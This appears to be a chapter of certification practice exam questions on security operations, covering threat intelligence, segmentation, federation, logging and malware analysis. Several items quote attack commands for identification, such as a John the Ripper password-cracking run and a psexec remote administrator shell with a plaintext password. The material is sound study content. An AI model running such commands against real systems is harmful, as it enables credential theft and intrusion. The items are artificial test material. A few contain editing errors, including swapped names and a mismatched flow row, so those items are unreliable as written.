Chapter 1
Domain 1.0: Security Operations

  1. Olivia is considering potential sources for threat intelligence information that she might incorporate into her security program. Which one of the following sources is most likely to be available without a subscription fee?
    1. Vulnerability feeds
    2. Open source
    3. Closed source
    4. Proprietary
  2. Roger is evaluating threat intelligence information sources and finds that one source results in quite a few false positive alerts. This lowers his confidence level in the source. What criteria for intelligence is not being met by this source?
    1. Timeliness
    2. Expense
    3. Relevance
    4. Accuracy
  3. Brad is working on a threat classification exercise, analyzing known threats and assessing the possibility of unknown threats. Which one of the following threat actors is most likely to be associated with an advanced persistent threat (APT)?
    1. Hacktivist
    2. Nation-state
    3. Insider
    4. Organized crime
  4. What term is used to describe the groups of related organizations that pool resources to share cybersecurity threat information and analyses?
    1. SOC
    2. ISAC
    3. CERT
    4. CIRT
  5. Singh incorporated the Cisco Talos tool into his organization's threat intelligence program. He uses it to automatically look up information about the past activity of IP addresses sending email to his mail servers. What term best describes this intelligence source?
    1. Open source
    2. Behavioral
    3. Reputational
    4. Indicator of compromise
  6. Jamal is assessing the risk to his organization from their planned use of AWS Lambda, a serverless computing service that allows developers to write code and execute functions directly on the cloud platform. What cloud tier best describes this service?
    1. SaaS
    2. PaaS
    3. IaaS
    4. FaaS
  7. Lauren's honeynet, shown here, is configured to use a segment of unused network space that has no legitimate servers in it. This design is particularly useful for detecting what types of threats?
    An illustration of Lauren’s honeynet. It has a border router, firewall or unified security device, internal trusted zone, honeynet, and internet.
    1. Zero-day attacks
    2. SQL injection
    3. Network scans
    4. DDoS attacks
  8. Fred believes that the malware he is tracking uses a fast flux DNS network, which associates many IP addresses with a single fully qualified domain name as well as using multiple download hosts. How many distinct hosts should he review based on the NetFlow shown here? 
    Date flow start   Duration     Proto    Src      IP Addr:Port  Dst IP Addr:Port      Packets   Bytes   Flows
2020-07-11        14:39:30.606 0.448    TCP      192.168.2.1:1451->10.2.3.1:443      10        1510    1
2020-07-11        14:39:30.826 0.448    TCP      10.2.3.1:443->192.168.2.1:1451      7         360     1
2020-07-11        14:45:32.495 18.492   TCP      10.6.2.4:443->192.168.2.1:1496      5         1107    1
2020-07-11        14:45:32.255 18.888   TCP      192.168.2.1:1496->10.6.2.4:443      11        1840    1
2020-07-11        14:46:54.983 0.000    TCP      192.168.2.1:1496->10.6.2.4:443      1         49      1
2020-07-11        16:45:34.764 0.362    TCP      10.6.2.4:443->192.168.2.1:4292      4         1392    1
2020-07-11        16:45:37.516 0.676    TCP      192.168.2.1:4292->10.6.2.4:443      4         462     1
2020-07-11        16:46:38.028 0.000    TCP      192.168.2.1:4292->10.6.2.4:443      2         89      1
2020-07-11        14:45:23.811 0.454    TCP      192.168.2.1:1515->10.6.2.5:443      4         263     1
2020-07-11        14:45:28.879 1.638    TCP      192.168.2.1:1505->10.6.2.5:443      18        2932    1
2020-07-11        14:45:29.087 2.288    TCP      10.6.2.5:443->192.168.2.1:1505      37        48125   1
2020-07-11        14:45:54.027 0.224    TCP      10.6.2.5:443->192.168.2.1:1515      2         1256    1
2020-07-11        14:45:58.551 4.328    TCP      192.168.2.1:1525->10.6.2.5:443      10        648     1
2020-07-11        14:45:58.759 0.920    TCP      10.6.2.5:443->192.168.2.1:1525      12        15792   1
2020-07-11        14:46:32.227 14.796   TCP      192.168.2.1:1525->10.8.2.5:443      31        1700    1
2020-07-11        14:46:52.983 0.000    TCP      192.168.2.1:1505->10.8.2.5:443      1         40      1
    1. 1
    2. 3
    3. 4
    4. 5
  9. Which one of the following functions is not a common recipient of threat intelligence information?
    1. Legal counsel
    2. Risk management
    3. Security engineering
    4. Detection and monitoring
  10. Alfonzo is an IT professional at a Portuguese university who is creating a cloud environment for use only by other Portuguese universities. What type of cloud deployment model is he using?
    1. Public cloud
    2. Private cloud
    3. Hybrid cloud
    4. Community cloud
  11. As a member of a blue team, Lukas observed the following behavior during an external penetration test. What should he report to his managers at the conclusion of the test?
    A window page presents the network latency and packet loss.
    1. A significant increase in latency.
    2. A significant increase in packet loss.
    3. Latency and packet loss both increased.
    4. No significant issues were observed.
  12. The company that Maria works for is making significant investments in infrastructure-as-a-service hosting to replace its traditional datacenter. Members of her organization's management have Maria's concerns about data remanence when Lauren's team moves from one virtual host to another in their cloud service provider's environment. What should she instruct her team to do to avoid this concern?
    1. Zero-wipe drives before moving systems.
    2. Use full-disk encryption.
    3. Use data masking.
    4. Span multiple virtual disks to fragment data.
  13. Geoff is reviewing logs and sees a large number of attempts to authenticate to his VPN server using many different username and password combinations. The same usernames are attempted several hundred times before moving on to the next one. What type of attack is most likely taking place?
    1. Credential stuffing
    2. Password spraying
    3. Brute-force
    4. Rainbow table
  14. Kaiden is configuring a SIEM service in his IaaS cloud environment that will receive all of the log entries generated by other devices in that environment. Which one of the following risks is greatest with this approach in the event of a DoS attack or other outage?
    1. Inability to access logs
    2. Insufficient logging
    3. Insufficient monitoring
    4. Insecure API
  15. Azra believes that one of her users may be taking malicious action on the systems she has access to. When she walks past the user's desktop, she sees the following command on the screen: 
    user12@workstation:/home/user12# ./john -wordfile:/home/user12/mylist.txt -format:lm hash.txt

    What is the user attempting to do?

    1. They are attempting to hash a file.
    2. They are attempting to crack hashed passwords.
    3. They are attempting to crack encrypted passwords.
    4. They are attempting a pass-the-hash attack.
  16. Lucas believes that an attacker has successfully compromised his web server. Using the following output of ps, identify the process ID he should focus on: 
    root      507  0.0  0.1 258268  3288 ?     Ssl  15:52  0:00 /usr/sbin/rsyslogd -n
message+  508  0.0  0.2  44176  5160 ?     Ss   15:52  0:00 /usr/bin/dbusdaemon --system --address=systemd: --nofork --nopidfile --systemd-activa
root      523  0.0  0.3 281092  6312 ?     Ssl  15:52  0:00 /usr/lib/accountsservice/accounts-daemon
root      524  0.0  0.7 389760 15956 ?     Ssl  15:52  0:00 /usr/sbin/NetworkManager --no-daemon
root      527  0.0  0.1  28432  2992 ?     Ss   15:52  0:00 /lib/systemd/systemd-logind
apache    714  0.0  0.1  27416  2748 ?     Ss   15:52  0:00 /www/temp/webmin
root      617  0.0  0.1  19312  2056 ?     Ss   15:52  0:00 /usr/sbin/irqbalance --pid=/var/run/irqbalance.pid
root      644  0.0  0.1 245472  2444 ?     Sl   15:52  0:01 /usr/sbin/VBoxService
root      653  0.0  0.0  12828  1848 tty1  Ss+  15:52  0:00 /sbin/agetty --noclear tty1 linux
root      661  0.0  0.3 285428  8088 ?     Ssl  15:52  0:00 /usr/lib/policykit-1/polkitd --no-debug
root      663  0.0  0.3 364752  7600 ?     Ssl  15:52  0:00 /usr/sbin/gdm3
root      846  0.0  0.5 285816 10884 ?     Ssl  15:53  0:00 /usr/lib/upower/upowerd
root      867  0.0  0.3 235180  7272 ?     Sl   15:53  0:00 gdm-session-worker [pam/gdm-launch-environment]
Debian-+  877  0.0  0.2  46892  4816 ?     Ss   15:53  0:00 /lib/systemd/systemd --user
Debian-+  878  0.0  0.0  62672  1596 ?     S    15:53  0:00 (sd-pam)
    1. 508
    2. 617
    3. 846
    4. 714
  17. Geoff is responsible for hardening systems on his network and discovers that a number of network appliances have exposed services, including telnet, FTP, and web servers. What is his best option to secure these systems?
    1. Enable host firewalls.
    2. Install patches for those services.
    3. Turn off the services for each appliance.
    4. Place a network firewall between the devices and the rest of the network.
  18. While conducting reconnaissance of his own organization, Ian discovers that multiple certificates are self-signed. What issue should he report to his management?
    1. Self-signed certificates do not provide secure encryption for site visitors.
    2. Self-signed certificates can be revoked only by the original creator.
    3. Self-signed certificates will cause warnings or error messages.
    4. None of the above.
  19. Brandon wants to perform a WHOIS query for a system he believes is located in Europe. Which NIC should he select to have the greatest likelihood of success for his query?
    1. AFRINIC
    2. APNIC
    3. RIPE
    4. LACNIC
  20. While reviewing Apache logs, Janet sees the following entries as well as hundreds of others from the same source IP address. What should Janet report has occurred? 
    [ 21/Jul/2020:02:18:33 -0500] - - 10.0.1.1 "GET /scripts/sample.php" "-" 302 336 0
[ 21/Jul/2020:02:18:35 -0500] - - 10.0.1.1 "GET /scripts/test.php" "-" 302 336 0
[ 21/Jul/2020:02:18:37 -0500] - - 10.0.1.1 "GET /scripts/manage.php" "-" 302 336 0
[ 21/Jul/2020:02:18:38 -0500] - - 10.0.1.1 "GET /scripts/download.php" "-" 302 336 0
[ 21/Jul/2020:02:18:40 -0500] - - 10.0.1.1 "GET /scripts/update.php" "-" 302 336 0
[ 21/Jul/2020:02:18:42 -0500] - - 10.0.1.1 "GET /scripts/new.php" "-" 302 336 0
    1. A denial-of-service attack
    2. A vulnerability scan
    3. A port scan
    4. A directory traversal attack
  21. Scott is part of the white team that is overseeing his organization's internal red and blue teams during an exercise that requires each team to only perform actions appropriate to the penetration test phase they are in. During the reconnaissance phase, he notes the following behavior as part of a Wireshark capture. What should he report?
    A window page presents the number, time, source, destination, protocol, length, and information data.
    1. The blue team has succeeded.
    2. The red team is violating the rules of engagement.
    3. The red team has succeeded.
    4. The blue team is violating the rules of engagement.
  22. Jennifer analyzes a Wireshark packet capture from a network that she is unfamiliar with. She discovers that a host with IP address 10.11.140.13 is running services on TCP ports 636 and 443. What services is that system most likely running?
    1. LDAPS and HTTPS
    2. FTPS and HTTPS
    3. RDP and HTTPS
    4. HTTP and Secure DNS
  23. While tracking a potential APT on her network, Cynthia discovers a network flow for her company's central file server. What does this flow entry most likely show if 10.2.2.3 is not a system on her network? 
    Date flow start     Duration Proto          Src   IP Addr:Port   Dst IP Addr:Port   Packets    Bytes    Flows
2017-07-11          13:06:46.343 21601804   TCP   10.1.1.1:1151->10.2.2.3:443       9473640    9.1 G    1
2017-07-11          13:06:46.551 21601804   TCP   10.2.2.3:443->10.1.1.1:1151       8345101    514 M    1
    1. A web browsing session
    2. Data exfiltration
    3. Data infiltration
    4. A vulnerability scan
  24. During a regularly scheduled PCI compliance scan, Fred has discovered port 3389 open on one of the point-of-sale terminals that he is responsible for managing. What service should he expect to find enabled on the system?
    1. MySQL
    2. RDP
    3. TOR
    4. Jabber
  25. Saanvi knows that the organization she is scanning runs services on alternate ports to attempt to reduce scans of default ports. As part of her intelligence-gathering process, she discovers services running on ports 8080 and 8443. What services are most likely running on these ports?
    1. Botnet C&C
    2. Nginx
    3. Microsoft SQL Server instances
    4. Web servers
  26. Kwame is reviewing his team's work as part of a reconnaissance effort and is checking Wireshark packet captures. His team reported no open ports on 10.0.2.15. What issue should he identify with their scan based on the capture shown here?
    A window page presents the number, time, source, destination, protocol, length, and information data.
    1. The host was not up.
    2. Not all ports were scanned.
    3. The scan scanned only UDP ports.
    4. The scan was not run as root.
  27. Angela wants to gather network traffic from systems on her network. What tool can she use to best achieve this goal?
    1. Nmap
    2. Wireshark
    3. Sharkbait
    4. Dradis
  28. Wang submits a suspected malware file to malwr.com and receives the following information about its behavior. What type of tool is malwr.com?
    An illustration presents a set of lists under signatures.
    1. A reverse-engineering tool
    2. A static analysis sandbox
    3. A dynamic analysis sandbox
    4. A decompiler sandbox
  29. Which sources are most commonly used to gather information about technologies a target organization uses during intelligence gathering?
    1. OSINT searches of support forums and social engineering
    2. Port scanning and social engineering
    3. Social media review and document metadata
    4. Social engineering and document metadata
  30. Sarah has been asked to assess the technical impact of suspected reconnaissance performed against her organization. She is informed that a reliable source has discovered that a third party has been performing reconnaissance by querying WHOIS data. How should Sarah categorize the technical impact of this type of reconnaissance?
    1. High.
    2. Medium.
    3. Low.
    4. She cannot determine this from the information given.
  31. Rick is reviewing flows of a system on his network and discovers the following flow logs. What is the system doing? 
    ICMP "Echo request"
Date flow start   Duration       Proto         Src IP Addr:Port->Dst IP Addr:Port   Packets   Bytes   Flows
2019-07-11        04:58:59.518   10.000 ICMP   10.1.1.1:0->10.2.2.6:8.0             11        924     1
2019-07-11        04:58:59.518   10.000 ICMP   10.2.2.6:0->10.1.1.1:0.0             11        924     1
2019-07-11        04:58:59.518   10.000 ICMP   10.1.1.1:0->10.2.2.7:8.0             11        924     1
2019-07-11        04:58:59.518   10.000 ICMP   10.2.2.7:0->10.1.1.1:0.0             11        924     1
2019-07-11        04:58:59.518   10.000 ICMP   10.1.1.1:0->10.2.2.8:8.0             11        924     1
2019-07-11        04:58:59.518   10.000 ICMP   10.2.2.8:0->10.1.1.1:0.0             11        924     1
2019-07-11        04:58:59.518   10.000 ICMP   10.1.1.1:0->10.2.2.9:8.0             11        924     1
2019-07-11        04:58:59.518   10.000 ICMP   10.2.2.9:0->10.1.1.1:0.0             11        924     1
2019-07-11        04:58:59.518   10.000 ICMP   10.1.1.1:0->10.2.2.10:8.0            11        924     1
2019-07-11        04:58:59.518   10.000 ICMP   10.2.2.10:0->10.1.1.1:0.0            11        924     1
2019-07-11        04:58:59.518   10.000 ICMP   10.1.1.1:0->10.2.2.6:11.0            11        924     1
2019-07-11        04:58:59.518   10.000 ICMP   10.2.2.11:0->10.1.1.1:0.0            11        924     1
    1. A port scan
    2. A failed three-way handshake
    3. A ping sweep
    4. A traceroute
  32. Ryan's passive reconnaissance efforts resulted in the following packet capture. Which of the following statements cannot be verified based on the packet capture shown for the host with IP address 10.0.2.4?
    An illustration of passive reconnaissance efforts resulted, packet capture shown for the host
    1. The host does not have a DNS entry.
    2. It is running a service on port 139.
    3. It is running a service on port 445.
    4. It is a Windows system.
  33. Kevin is concerned that an employee of his organization might fall victim to a phishing attack and wants to redesign his social engineering awareness program. What type of threat is he most directly addressing?
    1. Nation-state
    2. Hacktivist
    3. Unintentional insider
    4. Intentional insider
  34. What purpose does a honeypot system serve when placed on a network as shown in the following diagram?
    An illustration of honeypot system. It has a border router, firewall or unified security device, internal trusted zone, honeypot, and internet.
    1. It prevents attackers from targeting production servers.
    2. It provides information about the techniques attackers are using.
    3. It slows down attackers like sticky honey.
    4. It provides real-time input to IDSs and IPSs.
  35. A tarpit, or a system that looks vulnerable but actually is intended to slow down attackers, is an example of what type of technique?
    1. A passive defense
    2. A sticky defense
    3. An active defense
    4. A reaction-based defense
  36. Susan needs to test thousands of submitted binaries. She needs to ensure that the applications do not contain malicious code. What technique is best suited to this need?
    1. Sandboxing
    2. Implementing a honeypot
    3. Decompiling and analyzing the application code
    4. Fagan testing
  37. Manesh downloads a new security tool and checks its MD5. What does she know about the software she downloaded if she receives the following message? 
    root@demo:~# md5sum -c demo.md5
demo.txt: FAILED
md5sum: WARNING: 1 computed checksum did NOT match
    1. The file has been corrupted.
    2. Attackers have modified the file.
    3. The files do not match.
    4. The test failed and provided no answer.
  38. Aziz needs to provide SSH access to systems behind his datacenter firewall. If Aziz's organization uses the system architecture shown here, what is the system at point A called?
    A system architecture. It involves internet, datacenter servers, firewall or unified security device, and SSH connection.
    1. A firewall-hopper
    2. An isolated system
    3. A moat-protected host
    4. A jump box
  39. During his analysis of a malware sample, Sahib reviews the malware files and binaries without running them. What type of analysis is this?
    1. Automated analysis
    2. Dynamic analysis
    3. Static analysis
    4. Heuristic analysis
  40. Carol wants to analyze a malware sample that she has discovered. She wants to run the sample safely while capturing information about its behavior and impact on the system it infects. What type of tool should she use?
    1. A static code analysis tool
    2. A dynamic analysis sandbox tool
    3. A Fagan sandbox
    4. A decompiler running on an isolated VM
  41. Susan is reviewing files on a Windows workstation and believes that cmd.exe has been replaced with a malware package. Which of the following is the best way to validate her theory?
    1. Submit cmd.exe to VirusTotal.
    2. Compare the hash of cmd.exe to a known good version.
    3. Check the file using the National Software Reference Library.
    4. Run cmd.exe to make sure its behavior is normal.
  42. Nishi is deploying a new application that will process sensitive health information about her organization's clients. To protect this information, the organization is building a new network that does not share any hardware or logical access credentials with the organization's existing network. What approach is Nishi adopting?
    1. Network interconnection
    2. Network segmentation
    3. Virtual LAN (VLAN) isolation
    4. Virtual private network (VPN)
  43. Bobbi is deploying a single system that will be used to manage a sensitive industrial control process. This system will operate in a stand-alone fashion and not have any connection to other networks. What strategy is Bobbi deploying to protect this SCADA system?
    1. Network segmentation
    2. VLAN isolation
    3. Airgapping
    4. Logical isolation
  44. Geoff has been asked to identify a technical solution that will reduce the risk of captured or stolen passwords being used to allow access to his organization's systems. Which of the following technologies should he recommend?
    1. Captive portals
    2. Multifactor authentication
    3. VPNs
    4. OAuth
  45. The company that Amanda works for is making significant investments in infrastructure-as-a-service hosting to replace their traditional datacenter. Members of her organization's management have expressed concerns about data remanence when Amanda's team moves from one virtual host to another in their cloud service provider's environment. What should she instruct her team to do to avoid this concern?
    1. Perform zero-wipe drives before moving systems.
    2. Use full-disk encryption.
    3. Use data masking.
    4. Span multiple virtual disks to fragment data.
  46. Which one of the following technologies is not typically used to implement network segmentation?
    1. Host firewall
    2. Network firewall
    3. VLAN tagging
    4. Routers and switches
  47. Ian has been asked to deploy a secure wireless network in parallel with a public wireless network inside his organization's buildings. What type of segmentation should he implement to do so without adding additional costs and complexity?
    1. SSID segmentation
    2. Logical segmentation
    3. Physical segmentation
    4. WPA segmentation
  48. Barbara has segmented her virtualized servers using VMware to ensure that the networks remain secure and isolated. What type of attack could defeat her security design?
    1. VLAN hopping
    2. 802.1q trunking vulnerabilities
    3. Compromise of the underlying VMware host
    4. BGP route spoofing
  49. What major issue would Charles face if he relied on hashing malware packages to identify malware packages?
    1. Hashing can be spoofed.
    2. Collisions can result in false positives.
    3. Hashing cannot identify unknown malware.
    4. Hashing relies on unencrypted malware samples.
  50. Noriko wants to ensure that attackers cannot access his organization's building automation control network. Which of the following segmentation options provides the strongest level of assurance that this will not happen?
    1. Air gap
    2. VLANs
    3. Network firewalls
    4. Host firewalls

    Use the following scenario for questions 51–53.

    Angela is a security practitioner at a midsize company that recently experienced a serious breach due to a successful phishing attack. The company has committed to changing its security practices across the organization and has assigned Angela to determine the best strategy to make major changes that will have a significant impact right away.

  51. Angela's company has relied on passwords as its authentication factor for years. The current organizational standard is to require an eight-character, complex password and to require a password change every 12 months. What recommendation should Angela make to significantly decrease the likelihood of a similar phishing attack and breach in the future?
    1. Increase the password length.
    2. Shorten the password lifespan.
    3. Deploy multifactor authentication.
    4. Add a PIN to all logins.
  52. Angela has decided to roll out a multifactor authentication system. What are the two most common factors used in MFA systems?
    1. Location and knowledge
    2. Knowledge and possession
    3. Knowledge and biometric
    4. Knowledge and location
  53. Angela's multifactor deployment includes the ability to use text (SMS) messages to send the second factor for authentication. What issues should she point to?
    1. VoIP hacks and SIM swapping.
    2. SMS messages are logged on the recipient's phones.
    3. PIN hacks and SIM swapping.
    4. VoIP hacks and PIN hacks.
  54. What purpose does the OpenFlow protocol serve in software-defined networks?
    1. It captures flow logs from devices.
    2. It allows software-defined network controllers to push changes to devices to manage the network.
    3. It sends flow logs to flow controllers.
    4. It allows devices to push changes to SDN controllers to manage the network.
  55. Rick's security research company wants to gather data about current attacks and sets up a number of intentionally vulnerable systems that allow his team to log and analyze exploits and attack tools. What type of environment has Rick set up?
    1. A tarpit
    2. A honeypot
    3. A honeynet
    4. A blackhole
  56. Kalea wants to prevent DoS attacks against her serverless application from driving up her costs when using a cloud service. What technique is not an appropriate solution for her need?
    1. Horizontal scaling
    2. API keys
    3. Setting a cap on API invocations for a given timeframe
    4. Using timeouts
  57. What is the key difference between virtualization and containerization?
    1. Virtualization gives operating systems direct access to the hardware, whereas containerization does not allow applications to directly access the hardware.
    2. Virtualization lets you run multiple operating systems on a single physical system, whereas containerization lets you run multiple applications on the same system.
    3. Virtualization is necessary for containerization, but containerization is not necessary for virtualization.
    4. There is not a key difference; they are elements of the same technology.
  58. Brandon is designing the hosting environment for containerized applications. Application group A has personally identifiable information, application group B has health information with different legal requirements for handling, and application group C has business-sensitive data handling requirements. What is the most secure design for his container orchestration environment given the information he has?
    1. Run a single, highly secured container host with encryption for data at rest.
    2. Run a container host for each application group and secure them based on the data they contain.
    3. Run a container host for groups A and B, and run a lower-security container host for group C.
    4. Run a container host for groups A and C, and run a health information–specific container host for group B due to the health information it contains.
  59. Local and domain administrator accounts, root accounts, and service accounts are all examples of what type of account?
    1. Monitored accounts
    2. Privileged accounts
    3. Root accounts
    4. Unprivileged accounts
  60. Ned has discovered a key logger plugged into one of his workstations, and he believes that an attacker may have acquired usernames and passwords for all of the users of a shared workstation. Since he does not know how long the keylogger was in use or if it was used on multiple workstations, what is his best security option to prevent this and similar attacks from causing issues in the future?
    1. Multifactor authentication
    2. Password complexity rules
    3. Password lifespan rules
    4. Prevent the use of USB devices
  61. Facebook Connect, CAS, Shibboleth, and AD FS are all examples of what type of technology?
    1. Kerberos implementations
    2. Single sign-on implementations
    3. Federation technologies
    4. OAuth providers
  62. Which of the following is not a common identity protocol for federation?
    1. SAML
    2. OpenID
    3. OAuth
    4. Kerberos
  63. Naomi wants to enforce her organization's security policies on cloud service users. What technology is best suited to this?
    1. OAuth
    2. CASB
    3. OpenID
    4. DMARC
  64. Elliott wants to encrypt data sent between his servers. What protocol is most commonly used for secure web communications over a network?
    1. TLS
    2. SSL
    3. IPsec
    4. PPTP
  65. What occurs when a website's certificate expires?
    1. Web browsers will report an expired certificate to users.
    2. The website will no longer be accessible.
    3. The certificate will be revoked.
    4. All of the above.
  66. What term is used to describe defenses that obfuscate the attack surface of an organization by deploying decoys and attractive targets to slow down or distract an attacker?
    1. An active defense
    2. A honeyjar
    3. A bear trap
    4. An interactive defense
  67. What technology is most commonly used to protect data in transit for modern web applications?
    1. VPN
    2. TLS
    3. SSL
    4. IPsec
  68. Anja is assessing the security of a web service implementation. Which of the following web service security requirements should she recommend to reduce the likelihood of a successful on-path/man-in-the-middle attack?
    1. Use TLS.
    2. Use XML input validation.
    3. Use XML output validation.
    4. Virus-scan files received by web service.
  69. What type of access is typically required to compromise a physically isolated and air-gapped system?
    1. Wired network access
    2. Physical access
    3. Wireless network access
    4. None of the above, because an isolated, air-gapped system cannot be accessed
  70. Amanda's organization uses an air-gap design to protect the HSM device that stores its root encryption certificate. How will Amanda need to access the device if she wants to generate a new certificate?
    Two illustrations. Organizational network (left). HSM device and console (right).
    1. Wirelessly from her laptop
    2. Over the wired network from her PC
    3. From a system on the air-gapped network
    4. Amanda cannot access the device without physical access to it
  71. Which of the following parties directly communicate with the end user during a SAML transaction?
    1. The relying party
    2. The SAML identity provider
    3. Both the relying party and the identity provider
    4. Neither the relying party nor the identity provider
  72. Support for AES, 3DES, ECC, and SHA-256 are all examples of what?
    1. Encryption algorithms
    2. Hashing algorithms
    3. Processor security extensions
    4. Bus encryption modules
  73. Which of the following is not a benefit of physical segmentation?
    1. Easier visibility into traffic
    2. Improved network security
    3. Reduced cost
    4. Increased performance
  74. Which of the following options is most effective in preventing known password attacks against a web application?
    1. Account lockouts
    2. Password complexity settings
    3. CAPTCHAs
    4. Multifactor authentication
  75. Which of the following is not a common use case for network segmentation?
    1. Creating a VoIP network
    2. Creating a shared network
    3. Creating a guest wireless network
    4. Creating trust zones
  76. What three layers make up a software-defined network?
    1. Application, Datagram, and Physical layers
    2. Application, Control, and Infrastructure layers
    3. Control, Infrastructure, and Session layers
    4. Data link, Presentation, and Transport layers
  77. Micah is designing a containerized application security environment and wants to ensure that the container images he is deploying do not introduce security issues due to vulnerable applications. What can he integrate into the CI/CD pipeline to help prevent this?
    1. Automated checking of application hashes against known good versions
    2. Automated vulnerability scanning
    3. Automated fuzz testing
    4. Automated updates
  78. Camille wants to integrate with a federation. What will she need to authenticate her users to the federation?
    1. An IDP
    2. A SP
    3. An API gateway
    4. An SSO server
  79. Brandon needs to deploy containers with different purposes, data sensitivity levels, and threat postures to his container environment. How should he group them?
    1. Segment containers by purpose
    2. Segment containers by data sensitivity
    3. Segment containers by threat model
    4. All of the above
  80. What issues should Brandon consider before choosing to use the vulnerability management tools he has in his non-container-based security environment?
    1. Vulnerability management tools may make assumptions about host durability.
    2. Vulnerability management tools may make assumptions about update mechanisms and frequencies.
    3. Both A and B.
    4. Neither A nor B.
  81. What key functionality do enterprise privileged account management tools provide?
    1. Password creation
    2. Access control to individual systems
    3. Entitlement management across multiple systems
    4. Account expiration tools
  82. Amira wants to deploy an open standard–based single sign-on (SSO) tool that supports both authentication and authorization. What open standard should she look for if she wants to federate with a broad variety of identity providers and service providers?
    1. LDAP
    2. SAML
    3. OAuth
    4. OpenID Connect
  83. Adam is testing code written for a client-server application that handles financial information and notes that traffic is sent between the client and server via TCP port 80. What should he check next?
    1. If the server stores data in unencrypted form
    2. If the traffic is unencrypted
    3. If the systems are on the same network
    4. If usernames and passwords are sent as part of the traffic
  84. Faraj wants to use statistics gained from live analysis of his network to programmatically change its performance, routing, and optimization. Which of the following technologies is best suited to his needs?
    1. Serverless
    2. Software-defined networking
    3. Physical networking
    4. Virtual private networks (VPNs)
  85. Elaine's team has deployed an application to a cloud-hosted serverless environment. Which of the following security tools can she use in that environment?
    1. Endpoint antivirus
    2. Endpoint DLP
    3. IDS for the serverless environment
    4. None of the above
  86. Lucca needs to explain the benefits of network segmentation to the leadership of his organization. Which of the following is not a common benefit of segmentation?
    1. Decreasing the attack surface
    2. Increasing the number of systems in a network segment
    3. Limiting the scope of regulatory compliance efforts
    4. Increasing availability in the case of an issue or attack
  87. Kubernetes and Docker are examples of what type of technology?
    1. Encryption
    2. Software-defined networking
    3. Containerization
    4. Serverless
  88. Nathan is designing the logging infrastructure for his company and wants to ensure that a compromise of a system will not result in the loss of that system's logs. What should he do to protect the logs?
    1. Limit log access to administrators.
    2. Encrypt the logs.
    3. Rename the log files from their common name.
    4. Send the logs to a remote server.
  89. Ansel knows he wants to use federated identities in a project he is working on. Which of the following should not be among his choices for a federated identity protocol?
    1. OpenID
    2. SAML
    3. OAuth
    4. Authman
  90. James uploads a file that he believes is potentially a malware package to VirusTotal and receives positive results, but the file is identified with multiple different malware package names. What has most likely occurred?
    1. The malware is polymorphic and is being identified as multiple viruses because it is changing.
    2. Different antimalware engines call the same malware package by different names.
    3. VirusTotal has likely misidentified the malware package, and this is a false positive.
    4. The malware contains multiple malware packages, resulting in the matches.
  91. Isaac wants to monitor live memory usage on a Windows system. What tool should he use to see memory usage in a graphical user interface?
    1. MemCheck
    2. Performance Monitor
    3. WinMem
    4. Top
  92. Abul wants to identify typical behavior on a Windows system using a built-in tool to understand memory, CPU, and disk utilization. What tool can he use to see both real-time performance and over a period of time?
    1. sysmon
    2. sysgraph
    3. resmon
    4. resgraph
  93. The automated malware analysis tool that Jose is using uses a disassembler and performs binary diffing across multiple malware binaries. What information is the tool looking for?
    1. Calculating minimum viable signature length
    2. Binary fingerprinting to identify the malware author
    3. Building a similarity graph of similar functions across binaries
    4. Heuristic code analysis of development techniques
  94. What does execution of wmic.exe, powershell.exe, or winrm.vbs most likely indicate if you discover one or more was run on a typical end user's workstation?
    1. A scripted application installation
    2. Remote execution of code
    3. A scripted application uninstallation
    4. A zero-day attack
  95. Ben is reviewing network traffic logs and notices HTTP and HTTPS traffic originating from a workstation. What TCP ports should he expect to see this traffic sent to under most normal circumstances?
    1. 80 and 443
    2. 22 and 80
    3. 80 and 8088
    4. 22 and 443
  96. While Lucy is monitoring the SIEM, she notices that all of the log sources from her organization's New York branch have stopped reporting for the past 24 hours. What type of detection rules or alerts should she configure to make sure she is aware of this sooner next time?
    1. Heuristic
    2. Behavior
    3. Availability
    4. Anomaly
  97. After her discovery in the previous question, Lucy is tasked with configuring alerts that are sent to system administrators. She builds a rule that can be represented in pseudocode as follows:

    Send an SMS alert every 30 seconds when systems do not send logs for more than 1 minute.

    The average administrator at Lucy's organization is responsible for 150–300 machines.

    What danger does Lucy's alert create?

    1. A DDoS that causes administrators to not be able to access systems
    2. A network outage
    3. Administrators may ignore or filter the alerts
    4. A memory spike
  98. Lucy configures an alert that detects when users who do not typically travel log in from other countries. What type of analysis is this?
    1. Trend
    2. Availability
    3. Heuristic
    4. Behavior
  99. Disabling unneeded services is an example of what type of activity?
    1. Threat modeling
    2. Incident remediation
    3. Proactive risk assessment
    4. Reducing the threat attack surface area
  100. Suki notices inbound traffic to a Windows system on TCP port 3389 on her corporate network. What type of traffic is she most likely seeing?
    1. A NetBIOS file share
    2. A RADIUS connection
    3. An RDP connection
    4. A Kerberos connection
  101. Ian wants to capture information about privilege escalation attacks on a Linux system. If he believes that an insider is going to exploit a flaw that allows them to use sudo to assume root privileges, where is he most likely to find log information about what occurred?
    1. The sudoers file
    2. /var/log/sudo
    3. /var/log/auth.log
    4. Root's .bash_log
  102. What type of information can Gabby determine from Tripwire logs on a Linux system if it is configured to monitor a directory?
    1. How often the directory is accessed
    2. If files in the directory have changed
    3. If sensitive data was copied out of the directory
    4. Who has viewed files in the directory
  103. While reviewing systems she is responsible for, Charlene discovers that a user has recently run the following command in a Windows console window. What has occurred? 
    psexec \10.0.11.1 -u Administrator -p examplepw cmd.exe
    1. The user has opened a command prompt on their workstation.
    2. The user has opened a command prompt on the desktop of a remote workstation.
    3. The user has opened an interactive command prompt as administrator on a remote workstation.
    4. The user has opened a command prompt on their workstation as Administrator.
  104. While reviewing tcpdump data, Kwame discovers that hundreds of different IP addresses are sending a steady stream of SYN packets to a server on his network. What concern should Kwame have about what is happening?
    1. A firewall is blocking connections from occurring.
    2. An IPS is blocking connections from occurring.
    3. A denial-of-service attack.
    4. An ACK blockage.
  105. While reviewing Windows event logs for a Windows system with reported odd behavior, Kai discovers that the system she is reviewing shows Event ID 1005 MALWAREPROTECTION_SCAN_FAILED every day at the same time. What is the most likely cause of this issue?
    1. The system was shut down.
    2. Another antivirus program has interfered with the scan.
    3. The user disabled the scan.
    4. The scan found a file it was unable to scan.
  106. Charles wants to use his SIEM to automatically flag known bad IP addresses. Which of the following capabilities is not typically used for this with SIEM devices?
    1. Blocklisting
    2. IP reputation
    3. Allowlisting
    4. Domain reputation
  107. Gabby executes the following command. What is she doing? 
    ps -aux | grep apache2 | grep root
    1. Searching for all files owned by root named apache2.
    2. Checking currently running processes with the word apache2 and root both appearing in the output of ps.
    3. Shutting down all apache2 processes run by root.
    4. There is not enough information to answer this question.
